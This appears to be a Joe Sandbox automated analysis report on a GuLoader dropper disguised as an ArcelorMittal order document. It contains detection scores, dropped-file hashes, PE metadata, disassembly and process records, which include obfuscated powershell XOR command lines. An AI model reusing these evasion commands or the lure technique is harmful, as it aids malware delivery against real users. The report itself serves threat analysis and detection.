    Valid Accounts | 1 Native API | Path Interception | 1 Access Token Manipulation | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Access Token Manipulation | LSASS Memory | 1 Application Window Discovery | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Time Based Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Time Based Evasion | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 3 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
    Behavior Graph (ID 716470; sample Order_request_0003352030_Ar...; start date 05/10/2022; architecture WINDOWS; score 68)
    Signatures attached to the sample node: Multi AV Scanner detection for submitted file; Yara detected GuLoader; Executable has a suspicious name (potential lure to open the executable); Initial sample is a PE file and has a suspicious name.
    Process tree: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe (drops C:\Users\user\AppData\Local\...\nsExec.dll and C:\Users\user\AppData\Local\...\System.dll, both PE32; signature: Mass process execution to delay analysis) starts three powershell.exe instances and 55 other processes; each shown powershell.exe starts a conhost.exe, and the 55 other processes start three more conhost.exe and 51 other processes.

    Source | Detection | Scanner | Label
    Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | 73% | ReversingLabs | Win32.Trojan.Leonem
    Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | 33% | Metadefender |
    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dll | 8% | Metadefender |
    C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll | 0% | Metadefender |
    No Antivirus matches
    No contacted domains info
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://nsis.sf.net/NSIS_ErrorError | Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | false | | high
    No contacted IP infos
      Joe Sandbox Version:36.0.0 Rainbow Opal
      Analysis ID:716470
      Start date and time:2022-10-05 09:25:24 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 35s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:127
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal68.troj.evad.winEXE@166/5@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 45.4% (good quality ratio 44.5%)
      • Quality average: 88.8%
      • Quality standard deviation: 21.2%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 52
      • Number of non-executed functions: 32
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): fs.microsoft.com
      • Not all processes were analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.
      • VT rate limit hit for: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
      No simulations
      No context
Dropped file seen in other analyses (Match, Associated Sample Name / URL, Detection; SHA-256 and report links omitted, no Context given):
Match: C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dll
• Associated sample: new order.xlsx, Detection: malicious
• Associated sample: PI_372572000079567W.exe, Detection: malicious
• Associated sample: PI_372572000079567W.exe, Detection: malicious
• Associated sample: RFQ73645937392344.exe, Detection: malicious
• Associated sample: RFQ73645937392344.exe, Detection: malicious
• Associated sample: OmslagstegningGermany.exe, Detection: malicious
• Associated sample: OmslagstegningGermany.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious
• Associated sample: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious
• Associated sample: INVO-0987654345678.exe, Detection: malicious
• Associated sample: INVO-0987654345678.exe, Detection: malicious
• Associated sample: v22-003920.exe, Detection: malicious
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):11776
                                              Entropy (8bit):5.655335921632966
                                              Encrypted:false
                                              SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                              MD5:EE260C45E97B62A5E42F17460D406068
                                              SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                              SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                              SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              • Antivirus: Metadefender, Detection: 8%, Browse
                                              Joe Sandbox View:
                                              • Filename: new order.xlsx, Detection: malicious, Browse
                                              • Filename: PI_372572000079567W.exe, Detection: malicious, Browse
                                              • Filename: PI_372572000079567W.exe, Detection: malicious, Browse
                                              • Filename: RFQ73645937392344.exe, Detection: malicious, Browse
                                              • Filename: RFQ73645937392344.exe, Detection: malicious, Browse
                                              • Filename: OmslagstegningGermany.exe, Detection: malicious, Browse
                                              • Filename: OmslagstegningGermany.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious, Browse
                                              • Filename: INVO-0987654345678.exe, Detection: malicious, Browse
                                              • Filename: INVO-0987654345678.exe, Detection: malicious, Browse
                                              • Filename: v22-003920.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):6656
                                              Entropy (8bit):5.139253382998066
                                              Encrypted:false
                                              SSDEEP:96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
                                              MD5:1B0E41F60564CCCCCD71347D01A7C397
                                              SHA1:B1BDDD97765E9C249BA239E9C95AB32368098E02
                                              SHA-256:13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
                                              SHA-512:B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):824
                                              Entropy (8bit):5.20249576082362
                                              Encrypted:false
                                              SSDEEP:24:t4CBGDT/MA6x+mXkvG3ll4AeW0WNDNHkdMRAeW0fcj:gDT/owRvGn4AewpOiAe5cj
                                              MD5:4F05487595F8C324710ACC9E0359A72F
                                              SHA1:20FFAD557E25CA662F3EF4FCC0A0479F483B209E
                                              SHA-256:9BFFBE1954818E8A73B0A11734BC1D684118DF513766EDDD5C424E8FEBE74FAA
                                              SHA-512:128526C5A71F1E885E4F18157AEE73F7EEE98FBA15C32A28F42D9FCFAD953972409264F82F6A3A14A1AA1FAC829F39DB9CEAD2FEE06C0258F26DCBE2142BC751
                                              Malicious:false
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#bebebe" font-weight="400" fill="#474747"><path d="M1.75 4C.798 4 0 4.798 0 5.75v4.5C0 11.202.798 12 1.75 12h.125l-.781 1.563L.375 15h9.25l-.719-1.437L8.125 12h.125c.952 0 1.75-.798 1.75-1.75v-4.5C10 4.798 9.202 4 8.25 4zM2 6h6v4H2z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-family="Sans" overflow="visible"/><path d="M7.75 1C6.798 1 6 1.798 6 2.75V3h8v4h-3v3.25c0 .66-.252 1.27-.656 1.75h5.28l-1.5-3h.126C15.202 9 16 8.202 16 7.25v-4.5C16 1.798 15.202 1 14.25 1z" style="line-height:normal;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-family="Andale Mono" overflow="visible"/></g></svg>
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:ASCII text, with very long lines (33026), with no line terminators
                                              Category:dropped
                                              Size (bytes):33026
                                              Entropy (8bit):3.9996757943834025
                                              Encrypted:false
                                              SSDEEP:768:lHKaguobUqQBVK2YBYLZm+sMFIUfK1WvJvsefrM9QVUDQqIPbyq:lqag9bBOWYL0+sMdfCwJRQ99QqIP+q
                                              MD5:623EFE7EB234A081485070FFFAA64F7B
                                              SHA1:FED843582333608F0638AA899FCF160AE4539EA9
                                              SHA-256:B838758AF694DBEF9C8F5B57EEC38F0C66A35CF27F4FEA9A3A5230A586B0D9BB
                                              SHA-512:27E1306E111F0DFF7E4976D3AAB4C1208A57EE99B8E8570564DDAFBF52F881F2AB8290DC66F7850C3B07BE4B33BA12D6EB383744CA8BD5948ED7580B86C90265
                                              Malicious:false
                                              Preview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
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):75601
                                              Entropy (8bit):7.596335529805053
                                              Encrypted:false
                                              SSDEEP:1536:KlWX5dQqTczvX6odPXtl4AqykbknyUiCH/ZC4qyIfP1BMj/uvDtL:KGd/Qj6QXtl4AxEkyUiy/ZC4qvP1B4ut
                                              MD5:0A2A7A577FFC1CBD0CD4980A1FA68B31
                                              SHA1:02674F0BEF0FC4474605CB1027B89EC37A550534
                                              SHA-256:9927E32AB7E685B6B8F3BC0AE87B35AEE629E95AE3A7E5FB492B65A808019B3D
                                              SHA-512:E6FFE90D38A80FABA241B87CD975FAB1B2C4D9A2408926AF2E4D2B141FA1556CD2245814F705C30A268401B6D4612B5D728639956B18E670899AF480B9783CAD
                                              Malicious:false
                                              Preview:....Chaa..h....Z2..Ql.{.!}.......:...r`A...A.....#.+u)z.. 0..s...+$.(R._......Z.fO.......t.zh.*...._......p[........8..>...y...v*h>c.B.4.......b..n&...........s)T|..Ir...WB....D.c....._..f.g..:.....a.U.G6..{.....0.......O.M.>.4X..h0.......j<.5...?...D.K.DT...g.6p..4...OQ.`......,[.(#.cs6B......eV.z...b.M.4.Z.rR...^(....LNX-..4.... .+...gI.Dyq.6..S......=.....+z...4.F.9.Ci..j*5.W.m./...........eU3......t.f:."(.x'.c.........DcOB..@.p..~...er.........k.r.<<...ig..[*..0.......e.........5....]t!.0PE.9.........|:..&.j8..6...'..X....Lq.k.....[......`...b"i..+.......l..;.v..tq............8...aXa..U.c.k.z.C9C.L...P.[..ld..p.B.g..`..g=...#..N...K.M...;.f..Nh7+..sR......g.|oG*(.....Z<.-#>...Ub...F.@s5./..?E3.O....$o.7...0..[.........1.J..C..."c"n....<.g.Vq.".D.?.Y....#...V..Q#.Udl?e...&Q....6.........eA..6.6A......_G{...{..2..>....!....HW.{..E=...u.c...U.t.........._).:.......9..R..?.(.1T.%.T......;.Mz.f. .x..Z.cO.../!....x..R.J.....3Kx.
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.446552283541879
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File size:152504
                                              MD5:297cee2e9339ab19cb96a073ca8ba85f
                                              SHA1:b5467307b8d1bc03ca9ed311b2ca06a9806d3b47
                                              SHA256:9d0562b4cdc6c8a65119209d1f9dc4a06ce297afe2636b68a6772a470b0301a2
                                              SHA512:70852b7fb93198aaacfb124d17b4995c1f502ddf9df138ced15db4909e85287052a531c780c27dac54be66af4d2bff0c601f6a074cb4428f374b0f9ce85ebfd7
                                              SSDEEP:3072:a1T//IHWyWJADJuH1btqoqXpEszuTYT3Nf5hqDNPOTjEFMdj3r:M//I2y3A5tqPXp7qE9qpPOT8Mdv
                                              TLSH:D2E3E19177A0F123C8E24F3119AB9B6B9F7F9A1018501643C328AB8B7D31786FC1F656
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.G.@n..@n..@n./O1..@n..@o.K@n./O3..@n..c^..@n.+Fh..@n.Rich.@n.........................PE..L...e..V.................b....:....
                                              Icon Hash:f8ce9fb3a386ecf0
                                              Entrypoint:0x40327d
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x567F8465 [Sun Dec 27 06:25:41 2015 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                              Signature Valid:false
                                              Signature Issuer:OU="Udmundingens Administrator Jernvrk ", E=Leksikalisere@Millihg15.Hjl, O=Klasseundervisningerne, L=Rudhall, S=England, C=GB
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 10/14/2021 10:21:36 AM 10/13/2024 10:21:36 AM
                                              Subject Chain
                                              • OU="Udmundingens Administrator Jernvrk ", E=Leksikalisere@Millihg15.Hjl, O=Klasseundervisningerne, L=Rudhall, S=England, C=GB
                                              Version:3
                                              Thumbprint MD5:989D958BBA75F9ED140C17FF87CE9B78
                                              Thumbprint SHA-1:9D1DFBA4F47ACE4298D7058D82020DFC8C5FCFD6
                                              Thumbprint SHA-256:7E2D22EF8F2D6E9356AA4CF38ACDCF3258CB3350B3554253D08F5DE9C8AA78D3
                                              Serial:A5FAA65B4F605A1F
                                              Instruction
                                              sub esp, 000002D4h
                                              push ebp
                                              push esi
                                              push 00000020h
                                              xor ebp, ebp
                                              pop esi
                                              mov dword ptr [esp+0Ch], ebp
                                              push 00008001h
                                              mov dword ptr [esp+0Ch], 0040A300h
                                              mov dword ptr [esp+18h], ebp
                                              call dword ptr [004080B0h]
                                              call dword ptr [004080ACh]
                                              cmp ax, 00000006h
                                              je 00007FC2F8F5B183h
                                              push ebp
                                              call 00007FC2F8F5E2C6h
                                              cmp eax, ebp
                                              je 00007FC2F8F5B179h
                                              push 00000C00h
                                              call eax
                                              push ebx
                                              push edi
                                              push 0040A2F4h
                                              call 00007FC2F8F5E243h
                                              push 0040A2ECh
                                              call 00007FC2F8F5E239h
                                              push 0040A2E0h
                                              call 00007FC2F8F5E22Fh
                                              push 00000009h
                                              call 00007FC2F8F5E294h
                                              push 00000007h
                                              call 00007FC2F8F5E28Dh
                                              mov dword ptr [007A8A44h], eax
                                              call dword ptr [00408044h]
                                              push ebp
                                              call dword ptr [004082A8h]
                                              mov dword ptr [007A8AF8h], eax
                                              push ebp
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebp
                                              push 0079FF00h
                                              call dword ptr [0040818Ch]
                                              push 0040A2C8h
                                              push 007A7A40h
                                              call 00007FC2F8F5DE7Ah
                                              call dword ptr [004080A8h]
                                              mov ebx, 007B3000h
                                              push eax
                                              push ebx
                                              call 00007FC2F8F5DE68h
                                              push ebp
                                              call dword ptr [00408178h]
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
Data directories (Name, Virtual Address, Virtual Size, Is in Section):
• IMAGE_DIRECTORY_ENTRY_EXPORT: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_IMPORT: 0x84bc, 0xa0, .rdata
• IMAGE_DIRECTORY_ENTRY_RESOURCE: 0x3d8000, 0x6ea8, .rsrc
• IMAGE_DIRECTORY_ENTRY_EXCEPTION: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_SECURITY: 0x24cc8, 0x6f0, .data (this entry is a raw file offset, not an RVA; 0x24cc8 + 0x6f0 equals the 152504-byte file size, so the certificate table is appended at the end of the file and the ".data" placement is an artifact of resolving the offset as an RVA)
• IMAGE_DIRECTORY_ENTRY_BASERELOC: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_DEBUG: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_COPYRIGHT: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_GLOBALPTR: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_TLS: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_IAT: 0x8000, 0x2b8, .rdata
• IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_RESERVED: 0x0, 0x0
Sections (Name, Virtual Address, Virtual Size, Raw Size, Xored PE, ZLIB Complexity, File Type, Entropy, Characteristics):
• .text: VA 0x1000, Virtual Size 0x6155, Raw Size 0x6200, Xored PE: False, ZLIB Complexity: 0.6741470025510204, File Type: data, Entropy: 6.472221311938333, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
• .rdata: VA 0x8000, Virtual Size 0x1370, Raw Size 0x1400, Xored PE: False, ZLIB Complexity: 0.441015625, File Type: data, Entropy: 5.105712848520416, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
• .data: VA 0xa000, Virtual Size 0x39eb38, Raw Size 0x600, Xored PE: unknown, ZLIB Complexity: unknown, File Type: unknown, Entropy: unknown, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
• .ndata: VA 0x3a9000, Virtual Size 0x2f000, Raw Size 0x0, Xored PE: False, ZLIB Complexity: 0, File Type: empty, Entropy: 0.0, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
• .rsrc: VA 0x3d8000, Virtual Size 0x6ea8, Raw Size 0x7000, Xored PE: False, ZLIB Complexity: 0.545166015625, File Type: data, Entropy: 5.216552612077974, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources (Name, RVA, Size, Type, Language, Country):
• RT_ICON: RVA 0x3d8388, Size 0x25a8, Device independent bitmap graphic, 48 x 96 x 32, image size 9600, English, United States
• RT_ICON: RVA 0x3da930, Size 0x10a8, Device independent bitmap graphic, 32 x 64 x 32, image size 4224, English, United States
• RT_ICON: RVA 0x3db9d8, Size 0xea8, Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors, English, United States
• RT_ICON: RVA 0x3dc880, Size 0x8a8, Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors, English, United States
• RT_ICON: RVA 0x3dd128, Size 0x668, Device independent bitmap graphic, 48 x 96 x 4, image size 1152, English, United States
• RT_ICON: RVA 0x3dd790, Size 0x568, Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors, English, United States
• RT_ICON: RVA 0x3ddcf8, Size 0x468, Device independent bitmap graphic, 16 x 32 x 32, image size 1088, English, United States
• RT_ICON: RVA 0x3de160, Size 0x2e8, Device independent bitmap graphic, 32 x 64 x 4, image size 512, English, United States
• RT_ICON: RVA 0x3de448, Size 0x128, Device independent bitmap graphic, 16 x 32 x 4, image size 128, English, United States
• RT_DIALOG: RVA 0x3de570, Size 0x100, data, English, United States
• RT_DIALOG: RVA 0x3de670, Size 0xf8, data, English, United States
• RT_DIALOG: RVA 0x3de768, Size 0xa0, data, English, United States
• RT_DIALOG: RVA 0x3de808, Size 0x60, data, English, United States
• RT_GROUP_ICON: RVA 0x3de868, Size 0x84, data, English, United States
• RT_VERSION: RVA 0x3de8f0, Size 0x278, data, English, United States
• RT_MANIFEST: RVA 0x3deb68, Size 0x33f, XML 1.0 document, ASCII text, with very long lines (831), with no line terminators, English, United States
Imports (DLL: imported functions, in import-table order):
• KERNEL32.dll: SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
• USER32.dll: GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
• GDI32.dll: SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
• SHELL32.dll: SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
• ADVAPI32.dll: RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
• COMCTL32.dll: ImageList_Create, ImageList_AddMasked, ImageList_Destroy
• ole32.dll: OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system: English, Country where language is spoken: United States
                                              No network behavior found

                                              Target ID:0
                                              Start time:09:26:20
                                              Start date:05/10/2022
                                              Path:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              Imagebase:0x400000
                                              File size:152504 bytes
                                              MD5 hash:297CEE2E9339AB19CB96A073CA8BA85F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              Target ID:1
                                              Start time:09:26:25
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6B6570CB -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:2
                                              Start time:09:26:25
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:3
                                              Start time:09:26:27
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656C3197 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
